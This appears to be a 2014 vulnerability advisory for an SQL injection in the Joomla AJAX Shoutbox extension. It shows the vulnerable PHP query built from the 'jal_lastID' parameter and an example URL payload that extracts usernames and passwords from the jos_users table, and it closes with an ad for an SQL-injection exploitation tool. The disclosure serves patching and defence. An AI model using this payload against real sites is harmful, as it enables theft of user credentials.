路人甲 2014-03-17 06:26:12
Joomla AJAX Shoutbox SQL Injection
漏洞描述
######### Joomla AJAX Shoutbox Remote SQL Injection vulnerability [-] Author: Ibrahim Raafat [-] Contact: https://twitter.com/RaafatSEC [-] Discovery date: 1 April 2010 [ 4 years ago ] [-] Reported to vendor : 12 March 2014 [-] Response: Quick response from the developer, Patched and released version 1.7 in the same day [-] Download: http://extensions.joomla.org/extensions/communication/shoutbox/43 [+] Details: [-] include "helper.php"; [-] parameter: jal_lastID [-] Code: 113 $jal_lastID = JRequest::getVar( 'jal_lastID', 0 ); 114 115 $query = 'SELECT * FROM #__shoutbox WHERE id > '.$jal_lastID.' ORDER BY id DESC';
测试代码
Example: ?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- - [+] An amazing tool to discover and exploit SQL Injection vulnerability [ Sculptor - sculptordev.com ] Founded by https://twitter.com/MSM_1st #########################################
